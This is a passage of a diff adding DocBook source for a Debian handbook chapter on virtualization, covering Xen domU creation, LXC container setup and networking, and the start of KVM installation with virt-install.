+				Xen requires modifications to all the operating systems one wants to run on it; not all kernels have the same level of maturity in this regard. Many are fully-functional, both as dom0 and domU: Linux 3.0 and later, NetBSD 4.0 and later, and OpenSolaris. Others only work as a domU. You can check the status of each operating system in the Xen wiki: <ulink type="block" url="http://wiki.xenproject.org/wiki/Dom0_Kernels_for_Xen" /> <ulink type="block" url="http://wiki.xenproject.org/wiki/DomU_Support_for_Xen" />
+			</para>
+			 <para>
+				However, if Xen can rely on the hardware functions dedicated to virtualization (which are only present in more recent processors), even non-modified operating systems can run as domU (including Windows).
+			</para>
+			 </sidebar> <para>
+				Using Xen under Debian requires three components:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						The hypervisor itself. According to the available hardware, the appropriate package will be either <emphasis role="pkg">xen-hypervisor-4.4-amd64</emphasis>, <emphasis role="pkg">xen-hypervisor-4.4-armhf</emphasis>, or <emphasis role="pkg">xen-hypervisor-4.4-arm64</emphasis>.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						A kernel that runs on that hypervisor. Any kernel more recent than 3.0 will do, including the 3.16 version present in <emphasis role="distribution">Jessie</emphasis>.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						The i386 architecture also requires a standard library with the appropriate patches taking advantage of Xen; this is in the <emphasis role="pkg">libc6-xen</emphasis> package.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				In order to avoid the hassle of selecting these components by hand, a few convenience packages (such as <emphasis role="pkg">xen-linux-system-amd64</emphasis>) have been made available; they all pull in a known-good combination of the appropriate hypervisor and kernel packages. The hypervisor also brings <emphasis role="pkg">xen-utils-4.4</emphasis>, which contains tools to control the hypervisor from the dom0. This in turn brings the appropriate standard library. During the installation of all that, configuration scripts also create a new entry in the Grub bootloader menu, so as to start the chosen kernel in a Xen dom0. Note however that this entry is not usually set to be the first one in the list, and will therefore not be selected by default. If that is not the desired behavior, the following commands will change it:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>mv /etc/grub.d/20_linux_xen /etc/grub.d/09_linux_xen
+</userinput><computeroutput># </computeroutput><userinput>update-grub
+</userinput></screen>
+			 <para>
+				Once these prerequisites are installed, the next step is to test the behavior of the dom0 by itself; this involves a reboot to the hypervisor and the Xen kernel. The system should boot in its standard fashion, with a few extra messages on the console during the early initialization steps.
+			</para>
+			 <para>
+				Now is the time to actually install useful systems on the domU systems, using the tools from <emphasis role="pkg">xen-tools</emphasis>. This package provides the <command>xen-create-image</command> command, which largely automates the task. The only mandatory parameter is <literal>--hostname</literal>, giving a name to the domU; other options are important, but they can be stored in the <filename>/etc/xen-tools/xen-tools.conf</filename> configuration file, and their absence from the command line doesn't trigger an error. It is therefore important to either check the contents of this file before creating images, or to use extra parameters in the <command>xen-create-image</command> invocation. Important parameters of note include the following:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>--memory</literal>, to specify the amount of RAM dedicated to the newly created system;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>--size</literal> and <literal>--swap</literal>, to define the size of the “virtual disks” available to the domU;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>--debootstrap</literal>, to cause the new system to be installed with <command>debootstrap</command>; in that case, the <literal>--dist</literal> option will also most often be used (with a distribution name such as <emphasis role="distribution">jessie</emphasis>).
+					</para>
+					 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Installing a non-Debian system in a domU</title>
+					 <para>
+						In case of a non-Linux system, care should be taken to define the kernel the domU must use, using the <literal>--kernel</literal> option.
+					</para>
+					 </sidebar>
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>--dhcp</literal> states that the domU's network configuration should be obtained by DHCP while <literal>--ip</literal> allows defining a static IP address.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Lastly, a storage method must be chosen for the images to be created (those that will be seen as hard disk drives from the domU). The simplest method, corresponding to the <literal>--dir</literal> option, is to create one file on the dom0 for each device the domU should be provided. For systems using LVM, the alternative is to use the <literal>--lvm</literal> option, followed by the name of a volume group; <command>xen-create-image</command> will then create a new logical volume inside that group, and this logical volume will be made available to the domU as a hard disk drive.
+					</para>
+					 <sidebar> <title><emphasis>NOTE</emphasis> Storage in the domU</title>
+					 <para>
+						Entire hard disks can also be exported to the domU, as well as partitions, RAID arrays or pre-existing LVM logical volumes. These operations are not automated by <command>xen-create-image</command>, however, so editing the Xen image's configuration file is in order after its initial creation with <command>xen-create-image</command>.
+					</para>
+					 </sidebar>
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Once these choices are made, we can create the image for our future Xen domU:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>xen-create-image --hostname testxen --dhcp --dir /srv/testxen --size=2G --dist=jessie --role=udev</userinput>
+<computeroutput>
+[...]
+General Information
+--------------------
+Hostname       :  testxen
+Distribution   :  jessie
+Mirror         :  http://ftp.debian.org/debian/
+Partitions     :  swap            128Mb (swap)
+                  /               2G    (ext3)
+Image type     :  sparse
+Memory size    :  128Mb
+Kernel path    :  /boot/vmlinuz-3.16.0-4-amd64
+Initrd path    :  /boot/initrd.img-3.16.0-4-amd64
+[...]
+Logfile produced at:
+         /var/log/xen-tools/testxen.log
+
+Installation Summary
+---------------------
+Hostname        :  testxen
+Distribution    :  jessie
+MAC Address     :  00:16:3E:8E:67:5C
+IP-Address(es)  :  dynamic
+RSA Fingerprint :  0a:6e:71:98:95:46:64:ec:80:37:63:18:73:04:dd:2b
+Root Password   :  adaX2jyRHNuWm8BDJS7PcEJ
+</computeroutput></screen>
+			 <para>
+				We now have a virtual machine, but it is currently not running (and therefore only using space on the dom0's hard disk). Of course, we can create more images, possibly with different parameters.
+			</para>
+			 <para>
+				Before turning these virtual machines on, we need to define how they'll be accessed. They can of course be considered as isolated machines, only accessed through their system console, but this rarely matches the usage pattern. Most of the time, a domU will be considered as a remote server, and accessed only through a network. However, it would be quite inconvenient to add a network card for each domU; which is why Xen allows creating virtual interfaces, that each domain can see and use in a standard way. Note that these cards, even though they're virtual, will only be useful once connected to a network, even a virtual one. Xen has several network models for that:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						The simplest model is the <emphasis>bridge</emphasis> model; all the eth0 network cards (both in the dom0 and the domU systems) behave as if they were directly plugged into an Ethernet switch.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Then comes the <emphasis>routing</emphasis> model, where the dom0 behaves as a router that stands between the domU systems and the (physical) external network.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Finally, in the <emphasis>NAT</emphasis> model, the dom0 is again between the domU systems and the rest of the network, but the domU systems are not directly accessible from outside, and traffic goes through some network address translation on the dom0.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				These three networking nodes involve a number of interfaces with unusual names, such as <filename>vif*</filename>, <filename>veth*</filename>, <filename>peth*</filename> and <filename>xenbr0</filename>. The Xen hypervisor arranges them in whichever layout has been defined, under the control of the user-space tools. Since the NAT and routing models are only adapted to particular cases, we will only address the bridging model.
+			</para>
+			 <para>
+				The standard configuration of the Xen packages does not change the system-wide network configuration. However, the <command>xend</command> daemon is configured to integrate virtual network interfaces into any pre-existing network bridge (with <filename>xenbr0</filename> taking precedence if several such bridges exist). We must therefore set up a bridge in <filename>/etc/network/interfaces</filename> (which requires installing the <emphasis role="pkg">bridge-utils</emphasis> package, which is why the <emphasis role="pkg">xen-utils-4.4</emphasis> package recommends it) to replace the existing eth0 entry:
+			</para>
+			 
+<programlisting>auto xenbr0
+iface xenbr0 inet dhcp
+    bridge_ports eth0
+    bridge_maxwait 0
+</programlisting>
+			 <para>
+				After rebooting to make sure the bridge is automatically created, we can now start the domU with the Xen control tools, in particular the <command>xl</command> command. This command allows different manipulations on the domains, including listing them and, starting/stopping them.
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>xl list</userinput>
+<computeroutput>Name                                        ID   Mem VCPUs      State   Time(s)
+Domain-0                                     0   463     1     r-----      9.8
+# </computeroutput><userinput>xl create /etc/xen/testxen.cfg</userinput>
+<computeroutput>Parsing config from /etc/xen/testxen.cfg
+# </computeroutput><userinput>xl list</userinput>
+<computeroutput>Name                                        ID   Mem VCPUs      State   Time(s)
+Domain-0                                     0   366     1     r-----     11.4
+testxen                                      1   128     1     -b----      1.1</computeroutput></screen>
+			 <sidebar> <title><emphasis>TOOL</emphasis> Choice of toolstacks to manage Xen VM</title>
+			 <indexterm>
+				<primary><command>xm</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>xe</command></primary>
+			</indexterm>
+			 <para>
+				In Debian 7 and older releases, <command>xm</command> was the reference command line tool to use to manage Xen virtual machines. It has now been replaced by <command>xl</command> which is mostly backwards compatible. But those are not the only available tools: <command>virsh</command> of libvirt and <command>xe</command> of XenServer's XAPI (commercial offering of Xen) are alternative tools.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>CAUTION</emphasis> Only one domU per image!</title>
+			 <para>
+				While it is of course possible to have several domU systems running in parallel, they will all need to use their own image, since each domU is made to believe it runs on its own hardware (apart from the small slice of the kernel that talks to the hypervisor). In particular, it isn't possible for two domU systems running simultaneously to share storage space. If the domU systems are not run at the same time, it is however quite possible to reuse a single swap partition, or the partition hosting the <filename>/home</filename> filesystem.
+			</para>
+			 </sidebar> <para>
+				Note that the <filename>testxen</filename> domU uses real memory taken from the RAM that would otherwise be available to the dom0, not simulated memory. Care should therefore be taken, when building a server meant to host Xen instances, to provision the physical RAM accordingly.
+			</para>
+			 <para>
+				Voilà! Our virtual machine is starting up. We can access it in one of two modes. The usual way is to connect to it “remotely” through the network, as we would connect to a real machine; this will usually require setting up either a DHCP server or some DNS configuration. The other way, which may be the only way if the network configuration was incorrect, is to use the <filename>hvc0</filename> console, with the <command>xl console</command> command:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>xl console testxen</userinput>
+<computeroutput>[...]
+
+Debian GNU/Linux 8 testxen hvc0
+
+testxen login: </computeroutput></screen>
+			 <para>
+				One can then open a session, just like one would do if sitting at the virtual machine's keyboard. Detaching from this console is achieved through the <keycombo action="simul"><keycap>Control</keycap> <keycap>]</keycap></keycombo> key combination.
+			</para>
+			 <sidebar> <title><emphasis>TIP</emphasis> Getting the console straight away</title>
+			 <para>
+				Sometimes one wishes to start a domU system and get to its console straight away; this is why the <command>xl create</command> command takes a <literal>-c</literal> switch. Starting a domU with this switch will display all the messages as the system boots.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>TOOL</emphasis> OpenXenManager</title>
+			 <para>
+				OpenXenManager (in the <emphasis role="pkg">openxenmanager</emphasis> package) is a graphical interface allowing remote management of Xen domains via Xen's API. It can thus control Xen domains remotely. It provides most of the features of the <command>xl</command> command.
+			</para>
+			 </sidebar> <para>
+				Once the domU is up, it can be used just like any other server (since it is a GNU/Linux system after all). However, its virtual machine status allows some extra features. For instance, a domU can be temporarily paused then resumed, with the <command>xl pause</command> and <command>xl unpause</command> commands. Note that even though a paused domU does not use any processor power, its allocated memory is still in use. It may be interesting to consider the <command>xl save</command> and <command>xl restore</command> commands: saving a domU frees the resources that were previously used by this domU, including RAM. When restored (or unpaused, for that matter), a domU doesn't even notice anything beyond the passage of time. If a domU was running when the dom0 is shut down, the packaged scripts automatically save the domU, and restore it on the next boot. This will of course involve the standard inconvenience incurred when hibernating a laptop computer, for instance; in particular, if the domU is suspended for too long, network connections may expire. Note also that Xen is so far incompatible with a large part of ACPI power management, which precludes suspending the host (dom0) system.
+			</para>
+			 <sidebar> <title><emphasis>DOCUMENTATION</emphasis> <command>xl</command> options</title>
+			 <para>
+				Most of the <command>xl</command> subcommands expect one or more arguments, often a domU name. These arguments are well described in the <citerefentry><refentrytitle>xl</refentrytitle>
+				 <manvolnum>1</manvolnum></citerefentry> manual page.
+			</para>
+			 </sidebar> <para>
+				Halting or rebooting a domU can be done either from within the domU (with the <command>shutdown</command> command) or from the dom0, with <command>xl shutdown</command> or <command>xl reboot</command>.
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Advanced Xen</title>
+			 <para>
+				Xen has many more features than we can describe in these few paragraphs. In particular, the system is very dynamic, and many parameters for one domain (such as the amount of allocated memory, the visible hard drives, the behavior of the task scheduler, and so on) can be adjusted even when that domain is running. A domU can even be migrated across servers without being shut down, and without losing its network connections! For all these advanced aspects, the primary source of information is the official Xen documentation. <ulink type="block" url="http://www.xen.org/support/documentation.html" />
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.lxc">
+			<title>LXC</title>
+			 <indexterm>
+				<primary>LXC</primary>
+			</indexterm>
+			 <para>
+				Even though it is used to build “virtual machines”, LXC is not, strictly speaking, a virtualization system, but a system to isolate groups of processes from each other even though they all run on the same host. It takes advantage of a set of recent evolutions in the Linux kernel, collectively known as <emphasis>control groups</emphasis>, by which different sets of processes called “groups” have different views of certain aspects of the overall system. Most notable among these aspects are the process identifiers, the network configuration, and the mount points. Such a group of isolated processes will not have any access to the other processes in the system, and its accesses to the filesystem can be restricted to a specific subset. It can also have its own network interface and routing table, and it may be configured to only see a subset of the available devices present on the system.
+			</para>
+			 <para>
+				These features can be combined to isolate a whole process family starting from the <command>init</command> process, and the resulting set looks very much like a virtual machine. The official name for such a setup is a “container” (hence the LXC moniker: <emphasis>LinuX Containers</emphasis>), but a rather important difference with “real” virtual machines such as provided by Xen or KVM is that there's no second kernel; the container uses the very same kernel as the host system. This has both pros and cons: advantages include excellent performance due to the total lack of overhead, and the fact that the kernel has a global vision of all the processes running on the system, so the scheduling can be more efficient than it would be if two independent kernels were to schedule different task sets. Chief among the inconveniences is the impossibility to run a different kernel in a container (whether a different Linux version or a different operating system altogether).
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> LXC isolation limits</title>
+			 <para>
+				LXC containers do not provide the level of isolation achieved by heavier emulators or virtualizers. In particular:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						since the kernel is shared among the host system and the containers, processes constrained to containers can still access the kernel messages, which can lead to information leaks if messages are emitted by a container;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						for similar reasons, if a container is compromised and a kernel vulnerability is exploited, the other containers may be affected too;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						on the filesystem, the kernel checks permissions according to the numerical identifiers for users and groups; these identifiers may designate different users and groups depending on the container, which should be kept in mind if writable parts of the filesystem are shared among containers.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 </sidebar> <para>
+				Since we are dealing with isolation and not plain virtualization, setting up LXC containers is more complex than just running debian-installer on a virtual machine. We will describe a few prerequisites, then go on to the network configuration; we will then be able to actually create the system to be run in the container.
+			</para>
+			 <section>
+				<title>Preliminary Steps</title>
+				 <para>
+					The <emphasis role="pkg">lxc</emphasis> package contains the tools required to run LXC, and must therefore be installed.
+				</para>
+				 <para>
+					LXC also requires the <emphasis>control groups</emphasis> configuration system, which is a virtual filesystem to be mounted on <filename>/sys/fs/cgroup</filename>. Since Debian 8 switched to systemd, which also relies on control groups, this is now done automatically at boot time without further configuration.
+				</para>
+
+			</section>
+			 <section id="sect.lxc.network">
+				<title>Network Configuration</title>
+				 <para>
+					The goal of installing LXC is to set up virtual machines; while we could of course keep them isolated from the network, and only communicate with them via the filesystem, most use cases involve giving at least minimal network access to the containers. In the typical case, each container will get a virtual network interface, connected to the real network through a bridge. This virtual interface can be plugged either directly onto the host's physical network interface (in which case the container is directly on the network), or onto another virtual interface defined on the host (and the host can then filter or route traffic). In both cases, the <emphasis role="pkg">bridge-utils</emphasis> package will be required.
+				</para>
+				 <para>
+					The simple case is just a matter of editing <filename>/etc/network/interfaces</filename>, moving the configuration for the physical interface (for instance <literal>eth0</literal>) to a bridge interface (usually <literal>br0</literal>), and configuring the link between them. For instance, if the network interface configuration file initially contains entries such as the following:
+				</para>
+				 
+<programlisting>auto eth0
+iface eth0 inet dhcp</programlisting>
+				 <para>
+					They should be disabled and replaced with the following:
+				</para>
+				 
+<programlisting>#auto eth0
+#iface eth0 inet dhcp
+
+auto br0
+iface br0 inet dhcp
+  bridge-ports eth0</programlisting>
+				 <para>
+					The effect of this configuration will be similar to what would be obtained if the containers were machines plugged into the same physical network as the host. The “bridge” configuration manages the transit of Ethernet frames between all the bridged interfaces, which includes the physical <literal>eth0</literal> as well as the interfaces defined for the containers.
+				</para>
+				 <para>
+					In cases where this configuration cannot be used (for instance if no public IP addresses can be assigned to the containers), a virtual <emphasis>tap</emphasis> interface will be created and connected to the bridge. The equivalent network topology then becomes that of a host with a second network card plugged into a separate switch, with the containers also plugged into that switch. The host must then act as a gateway for the containers if they are meant to communicate with the outside world.
+				</para>
+				 <para>
+					In addition to <emphasis role="pkg">bridge-utils</emphasis>, this “rich” configuration requires the <emphasis role="pkg">vde2</emphasis> package; the <filename>/etc/network/interfaces</filename> file then becomes:
+				</para>
+				 
+<programlisting># Interface eth0 is unchanged
+auto eth0
+iface eth0 inet dhcp
+
+# Virtual interface 
+auto tap0
+iface tap0 inet manual
+  vde2-switch -t tap0
+
+# Bridge for containers
+auto br0
+iface br0 inet static
+  bridge-ports tap0
+  address 10.0.0.1
+  netmask 255.255.255.0
+</programlisting>
+				 <para>
+					The network can then be set up either statically in the containers, or dynamically with DHCP server running on the host. Such a DHCP server will need to be configured to answer queries on the <literal>br0</literal> interface.
+				</para>
+
+			</section>
+			 <section>
+				<title>Setting Up the System</title>
+				 <para>
+					Let us now set up the filesystem to be used by the container. Since this “virtual machine” will not run directly on the hardware, some tweaks are required when compared to a standard filesystem, especially as far as the kernel, devices and consoles are concerned. Fortunately, the <emphasis role="pkg">lxc</emphasis> includes scripts that mostly automate this configuration. For instance, the following commands (which require the <emphasis role="pkg">debootstrap</emphasis> and <emphasis role="pkg">rsync</emphasis> packages) will install a Debian container:
+				</para>
+				 
+<screen><computeroutput>root@mirwiz:~# </computeroutput><userinput>lxc-create -n testlxc -t debian
+</userinput><computeroutput>debootstrap is /usr/sbin/debootstrap
+Checking cache download in /var/cache/lxc/debian/rootfs-jessie-amd64 ... 
+Downloading debian minimal ...
+I: Retrieving Release 
+I: Retrieving Release.gpg 
+[...]
+Download complete.
+Copying rootfs to /var/lib/lxc/testlxc/rootfs...
+[...]
+Root password is 'sSiKhMzI', please change !
+root@mirwiz:~# </computeroutput>
+</screen>
+				 <para>
+					Note that the filesystem is initially created in <filename>/var/cache/lxc</filename>, then moved to its destination directory. This allows creating identical containers much more quickly, since only copying is then required.
+				</para>
+				 <para>
+					Note that the debian template creation script accepts an <option>--arch</option> option to specify the architecture of the system to be installed and a <option>--release</option> option if you want to install something else than the current stable release of Debian. You can also set the <literal>MIRROR</literal> environment variable to point to a local Debian mirror.
+				</para>
+				 <para>
+					The newly-created filesystem now contains a minimal Debian system, and by default the container has no network interface (besides the loopback one). Since this is not really wanted, we will edit the container's configuration file (<filename>/var/lib/lxc/testlxc/config</filename>) and add a few <literal>lxc.network.*</literal> entries:
+				</para>
+				 
+<programlisting>lxc.network.type = veth
+lxc.network.flags = up
+lxc.network.link = br0
+lxc.network.hwaddr = 4a:49:43:49:79:20
+</programlisting>
+				 <para>
+					These entries mean, respectively, that a virtual interface will be created in the container; that it will automatically be brought up when said container is started; that it will automatically be connected to the <literal>br0</literal> bridge on the host; and that its MAC address will be as specified. Should this last entry be missing or disabled, a random MAC address will be generated.
+				</para>
+				 <para>
+					Another useful entry in that file is the setting of the hostname:
+				</para>
+				 
+<programlisting>lxc.utsname = testlxc
+</programlisting>
+
+			</section>
+			 <section>
+				<title>Starting the Container</title>
+				 <para>
+					Now that our virtual machine image is ready, let's start the container:
+				</para>
+				 
+<screen role="scale" width="94"><computeroutput>root@mirwiz:~# </computeroutput><userinput>lxc-start --daemon --name=testlxc
+</userinput><computeroutput>root@mirwiz:~# </computeroutput><userinput>lxc-console -n testlxc
+</userinput><computeroutput>Debian GNU/Linux 8 testlxc tty1
+
+testlxc login: </computeroutput><userinput>root</userinput><computeroutput>
+Password: 
+Linux testlxc 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+root@testlxc:~# </computeroutput><userinput>ps auxwf</userinput>
+<computeroutput>USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
+root         1  0.0  0.2  28164  4432 ?        Ss   17:33   0:00 /sbin/init
+root        20  0.0  0.1  32960  3160 ?        Ss   17:33   0:00 /lib/systemd/systemd-journald
+root        82  0.0  0.3  55164  5456 ?        Ss   17:34   0:00 /usr/sbin/sshd -D
+root        87  0.0  0.1  12656  1924 tty2     Ss+  17:34   0:00 /sbin/agetty --noclear tty2 linux
+root        88  0.0  0.1  12656  1764 tty3     Ss+  17:34   0:00 /sbin/agetty --noclear tty3 linux
+root        89  0.0  0.1  12656  1908 tty4     Ss+  17:34   0:00 /sbin/agetty --noclear tty4 linux
+root        90  0.0  0.1  63300  2944 tty1     Ss   17:34   0:00 /bin/login --     
+root       117  0.0  0.2  21828  3668 tty1     S    17:35   0:00  \_ -bash
+root       268  0.0  0.1  19088  2572 tty1     R+   17:39   0:00      \_ ps auxfw
+root        91  0.0  0.1  14228  2356 console  Ss+  17:34   0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 vt102
+root       197  0.0  0.4  25384  7640 ?        Ss   17:38   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.e
+root       266  0.0  0.1  12656  1840 ?        Ss   17:39   0:00 /sbin/agetty --noclear tty5 linux
+root       267  0.0  0.1  12656  1928 ?        Ss   17:39   0:00 /sbin/agetty --noclear tty6 linux
+root@testlxc:~# </computeroutput></screen>
+				 <para>
+					We are now in the container; our access to the processes is restricted to only those started from the container itself, and our access to the filesystem is similarly restricted to the dedicated subset of the full filesystem (<filename>/var/lib/lxc/testlxc/rootfs</filename>). We can exit the console with <keycombo action="simul"><keycap>Control</keycap> <keycap>a</keycap></keycombo> <keycombo><keycap>q</keycap></keycombo>.
+				</para>
+				 <para>
+					Note that we ran the container as a background process, thanks to the <option>--daemon</option> option of <command>lxc-start</command>. We can interrupt the container with a command such as <command>lxc-stop --name=testlxc</command>.
+				</para>
+				 <para>
+					The <emphasis role="pkg">lxc</emphasis> package contains an initialization script that can automatically start one or several containers when the host boots (it relies on <command>lxc-autostart</command> which starts containers whose <literal>lxc.start.auto</literal> option is set to 1). Finer-grained control of the startup order is possible with <literal>lxc.start.order</literal> and <literal>lxc.group</literal>: by default, the initialization script first starts containers which are part of the <literal>onboot</literal> group and then the containers which are not part of any group. In both cases, the order within a group is defined by the <literal>lxc.start.order</literal> option.
+				</para>
+				 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Mass virtualization</title>
+				 <para>
+					Since LXC is a very lightweight isolation system, it can be particularly adapted to massive hosting of virtual servers. The network configuration will probably be a bit more advanced than what we described above, but the “rich” configuration using <literal>tap</literal> and <literal>veth</literal> interfaces should be enough in many cases.
+				</para>
+				 <para>
+					It may also make sense to share part of the filesystem, such as the <filename>/usr</filename> and <filename>/lib</filename> subtrees, so as to avoid duplicating the software that may need to be common to several containers. This will usually be achieved with <literal>lxc.mount.entry</literal> entries in the containers configuration file. An interesting side-effect is that the processes will then use less physical memory, since the kernel is able to detect that the programs are shared. The marginal cost of one extra container can then be reduced to the disk space dedicated to its specific data, and a few extra processes that the kernel must schedule and manage.
+				</para>
+				 <para>
+					We haven't described all the available options, of course; more comprehensive information can be obtained from the <citerefentry> <refentrytitle>lxc</refentrytitle>
+					 <manvolnum>7</manvolnum> </citerefentry> and <citerefentry> <refentrytitle>lxc.container.conf</refentrytitle>
+					 <manvolnum>5</manvolnum></citerefentry> manual pages and the ones they reference.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section>
+			<title>Virtualization with KVM</title>
+			 <indexterm>
+				<primary>KVM</primary>
+			</indexterm>
+			 <para>
+				KVM, which stands for <emphasis>Kernel-based Virtual Machine</emphasis>, is first and foremost a kernel module providing most of the infrastructure that can be used by a virtualizer, but it is not a virtualizer by itself. Actual control for the virtualization is handled by a QEMU-based application. Don't worry if this section mentions <command>qemu-*</command> commands: it is still about KVM.
+			</para>
+			 <para>
+				Unlike other virtualization systems, KVM was merged into the Linux kernel right from the start. Its developers chose to take advantage of the processor instruction sets dedicated to virtualization (Intel-VT and AMD-V), which keeps KVM lightweight, elegant and not resource-hungry. The counterpart, of course, is that KVM doesn't work on any computer but only on those with appropriate processors. For x86-based computers, you can verify that you have such a processor by looking for “vmx” or “svm” in the CPU flags listed in <filename>/proc/cpuinfo</filename>.
+			</para>
+			 <para>
+				With Red Hat actively supporting its development, KVM has more or less become the reference for Linux virtualization.
+			</para>
+			 <section>
+				<title>Preliminary Steps</title>
+				 <indexterm>
+					<primary><command>virt-install</command></primary>
+				</indexterm>
+				 <para>
+					Unlike such tools as VirtualBox, KVM itself doesn't include any user-interface for creating and managing virtual machines. The <emphasis role="pkg">qemu-kvm</emphasis> package only provides an executable able to start a virtual machine, as well as an initialization script that loads the appropriate kernel modules.
+				</para>
+				 <indexterm>
+					<primary>libvirt</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><emphasis role="pkg">virt-manager</emphasis></primary>
+				</indexterm>
+				 <para>
+					Fortunately, Red Hat also provides another set of tools to address that problem, by developing the <emphasis>libvirt</emphasis> library and the associated <emphasis>virtual machine manager</emphasis> tools. libvirt allows managing virtual machines in a uniform way, independently of the virtualization system involved behind the scenes (it currently supports QEMU, KVM, Xen, LXC, OpenVZ, VirtualBox, VMWare and UML). <command>virtual-manager</command> is a graphical interface that uses libvirt to create and manage virtual machines.
+				</para>
+				 <indexterm>
+					<primary><emphasis role="pkg">virtinst</emphasis></primary>
+				</indexterm>
+				 <para>
+					We first install the required packages, with <command>apt-get install qemu-kvm libvirt-bin virtinst virt-manager virt-viewer</command>. <emphasis role="pkg">libvirt-bin</emphasis> provides the <command>libvirtd</command> daemon, which allows (potentially remote) management of the virtual machines running of the host, and starts the required VMs when the host boots. In addition, this package provides the <command>virsh</command> command-line tool, which allows controlling the <command>libvirtd</command>-managed machines.
+				</para>
+				 <para>
+					The <emphasis role="pkg">virtinst</emphasis> package provides <command>virt-install</command>, which allows creating virtual machines from the command line. Finally, <emphasis role="pkg">virt-viewer</emphasis> allows accessing a VM's graphical console.
+				</para>
+
+			</section>
+			 <section>
+				<title>Network Configuration</title>
+				 <para>
+					Just as in Xen and LXC, the most frequent network configuration involves a bridge grouping the network interfaces of the virtual machines (see <xref linkend="sect.lxc.network" />).
+				</para>
+				 <para>
+					Alternatively, and in the default configuration provided by KVM, the virtual machine is assigned a private address (in the 192.168.122.0/24 range), and NAT is set up so that the VM can access the outside network.
+				</para>
+				 <para>
+					The rest of this section assumes that the host has an <literal>eth0</literal> physical interface and a <literal>br0</literal> bridge, and that the former is connected to the latter.
+				</para>
+
+			</section>
+			 <section>
+				<title>Installation with <command>virt-install</command></title>
+				 <indexterm>
+					<primary><command>virt-install</command></primary>
+				</indexterm>
+				 <para>
+					Creating a virtual machine is very similar to installing a normal system, except that the virtual machine's characteristics are described in a seemingly endless command line.
+				</para>
+				 <para>
+					Practically speaking, this means we will use the Debian installer, by booting the virtual machine on a virtual DVD-ROM drive that maps to a Debian DVD image stored on the host system. The VM will export its graphical console over the VNC protocol (see <xref linkend="sect.remote-desktops" /> for details), which will allow us to control the installation process.
+				</para>
+				 <para>
+					We first need to tell libvirtd where to store the disk images, unless the default location (<filename>/var/lib/libvirt/images/</filename>) is fine.
+				</para>
+				 
+<screen><computeroutput>root@mirwiz:~# </computeroutput><userinput>mkdir /srv/kvm</userinput>
+<computeroutput>root@mirwiz:~# </computeroutput><userinput>virsh pool-create-as srv-kvm dir --target /srv/kvm</userinput>
+<computeroutput>Pool srv-kvm created
+
+root@mirwiz:~# </computeroutput></screen>
+				 <sidebar> <title><emphasis>TIP</emphasis> Add your user to the libvirt group</title>
+				 <para>
+					All samples in this section assume that you are running commands as root. Effectively, if you want to control a local libvirt daemon, you need either to be root or to be a member of the <literal>libvirt</literal> group (which is not the case by default). Thus if you want to avoid using root rights too often, you can add yoursel to the <literal>libvirt</literal> group and run the various commands under your user identity.
+				</para>
+				 </sidebar> <para>
+					Let us now start the installation process for the virtual machine, and have a closer look at <command>virt-install</command>'s most important options. This command registers the virtual machine and its parameters in libvirtd, then starts it so that its installation can proceed.
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>virt-install --connect qemu:///system  <co id="virtinst.connect"></co>
+               --virt-type kvm           <co id="virtinst.type"></co>
+               --name testkvm            <co id="virtinst.name"></co>
+               --ram 1024                <co id="virtinst.ram"></co>
+               --disk /srv/kvm/testkvm.qcow,format=qcow2,size=10 <co id="virtinst.disk"></co>
+               --cdrom /srv/isos/debian-8.1.0-amd64-netinst.iso  <co id="virtinst.cdrom"></co>
+               --network bridge=br0      <co id="virtinst.network"></co>
+               --vnc                     <co id="virtinst.vnc"></co>
+               --os-type linux           <co id="virtinst.os"></co>
+               --os-variant debianwheezy
+</userinput><computeroutput>
+Starting install...
+Allocating 'testkvm.qcow'             |  10 GB     00:00
+Creating domain...                    |    0 B     00:00
+Guest installation complete... restarting guest.
+</computeroutput></screen>
+				 <calloutlist>
+					<callout arearefs="virtinst.connect">
+						<para>
